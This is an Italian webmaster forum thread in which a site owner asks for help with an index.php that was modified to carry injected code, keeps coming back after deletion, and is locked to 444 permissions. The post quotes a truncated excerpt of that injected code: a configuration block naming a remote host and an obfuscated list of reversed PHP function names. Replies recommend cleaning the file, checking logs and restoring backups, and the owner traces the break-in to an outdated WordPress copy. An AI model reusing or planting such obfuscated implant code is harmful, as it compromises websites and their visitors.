[Dominio] File con permessi 444 e codice malevolo

felino

Utente Attivo
12 Dic 2013
902
10
18
Aci Catena (Catania)
Buongiorno a tutti,
ho un dominio su Aruba, nel ho pubblicato:
- un ecommerce nella directory /shop
- un file index.php nella root che al momento fa un redirect alla cartella /shop

Da un mesetto circa il file index.php e' stato modificato (non da me) con del codice malevole con tutte le conseguenze del caso.

Il problema e' che tale file ha i permessi settati a 444, provo a modificarli e ottengo un messaggio di errore.
Ho richiesto supporto ad Aruba.it per la cancellazione, una volta cancellato viene generato nuovamente.
Stesso identico problema ce l'ho con il file .htaccess

Qualche suggerimento?

Qui una parte del contenuto:
PHP:
<?php @'$
yumingid=47
lineid=2332
x3=index.php/
x4=ghpyxlOwbV
x5=underlying,roadside,alone,ethics,smaller,hotpants,agree,jasper,horse,Baby,stick,despair,SharkFin,bulk,Apprentice,whole,plow,coconutmilk,trunklineelectrification,inspire,impossible,pantyhose,earthquake,sage,BarberShop,carrier,evidence,English,Latin,definite
x6=
x7=http://jnice01.ouuwtizhy573nskt/weilai0.php
cache=0000
sps=111111000
urlgz=[0:3]^[0:8]-[0:6~12][1:6]/[0:8~10]!/|[0:7~10]^/[1:8]/!/[0:10~15]/|[0:8~10]^-[2:10~12]-[2:4]-[2:6]-!/|^-[2:8~12]-[2:5~10]-[0:5][1:8]/![0:3]/|^[0:10~12]/[0:1]_[2:8~12]-!/|[0:10~12]^/[0:6~12]_[1:6]-!/|[0:10~15]_[0:6~10]-^-![0:2]/|[0:10~12]-[0:1]^-[0:4]-[0:1]!-[0:10~12]/|[0:1]^-[0:3]-[0:10~12]-[0:5]-[0:5]!/|^/[0:10~12]_[1:3~5][0:4]-[0:8]-!/|^[0:5]_[1:5]_[2:12~15]_!|[0:3~5]-^-[1:10~12]-[0:10~12]/![0:2]|^[0:6~8]/[1:8~12]-!/[0:5~8]|^_[1:6~8]_[1:6~8]/[2:8~12]_[0:5~8]/!|[0:12]_^-[2:10~15]_[0:6~8]_!|[0:10~15]/^-[1:6~8]/!|^[3:6~10]/[0:1]_[2:12]_!|[0:8]/[0:6~8]/^-!/[0:8~10].php|^/[2:10~12]/[1:8~10]-!-[0:3].jp|^_[1:6~8]/[1:6~8]_[0:10~12][1:5]/!.jp|[0:3]^[0:3]-[2:8]-[1:5][0:3]-[2:6]-[0:6][1:4]/[0:2]!.html|[0:8~10]/^-!/[0:15~18].html|[0:6~8]/[0:15~18]/^-!.html
';$bbb6b6b66=explode("1l","tilps_gerp1ledocnelru1lemaner1lyarra_ni1lezilairesnu1lstegf1l5dm1lcexe_lruc1lofniphp1lstnetnoc_teg_elif1lrtsbus1ldomhc1llla_hctam_gerp1ldnar_tm1lrewolotrts1lnelrts1lrhc1letad1lemit1lemitmelif1lliec1lgnol2pi1lnepof1ltroba_resu_erongi1lsehsalscdda1ldnar_yarra1llru_esrap1lenifed1ledocedlru1lemanybtsohteg1lelffuhs1lfoef1lrtrts1ltini_lruc1ltfihsnu_yarra1lftnirps1ledolpmi1lciremun_si1lhcuot1letirwf1lyarra_si1lemitotrts1ltimil_emit_tes1lredaeh1legrem_yarra1leuqinu_yarra1ltrats_bo1ltnuoc1lelif_si1lstsixe_noitcnuf1lstsixe_elif1lhctam_gerp1lecalper_gerp1leikooctes1lsoprts1lmirt1lsopirts1lrddaybtsohteg1ltcartxe1legnar1lesolcf1ldro1ledolpxe1lpop_yarra1lsoprrts1lesolc_lruc1ltpotes_lruc1lecalper_rts");foreach($bbb6b6b66 as$b6bbbbbbb=>$bbbb6b6)
.....
 
Ultima modifica di un moderatore:

Utixo Cloud Services

Nuovo Utente
26 Mar 2019
7
0
1
Milano
utixo.it
semplice, pulisci il codice a mano perche non ce altra possibilita e poi devi capire come riescono ad accedere al filesystem, di solito dai log si puo capire facilemente. Oppure ripristina un backup precedente alla modifica dei files.
 

Max 1

Super Moderatore
Membro dello Staff
SUPER MOD
MOD
29 Feb 2012
4.278
330
83
@felino
Quando posti del codice PHP devi usare il tag [ PHP] non il tag [ CODE]
Grazie
 

felino

Utente Attivo
12 Dic 2013
902
10
18
Aci Catena (Catania)
semplice, pulisci il codice a mano perche non ce altra possibilita e poi devi capire come riescono ad accedere al filesystem, di solito dai log si puo capire facilemente. Oppure ripristina un backup precedente alla modifica dei files.
Ho trovato il problema, nel server era presente una versione di backup e non aggiornata di Wordpress....quella ha generato il problema!

@felino
Quando posti del codice PHP devi usare il tag [ PHP] non il tag [ CODE]
Grazie
Hai ragione, scusami!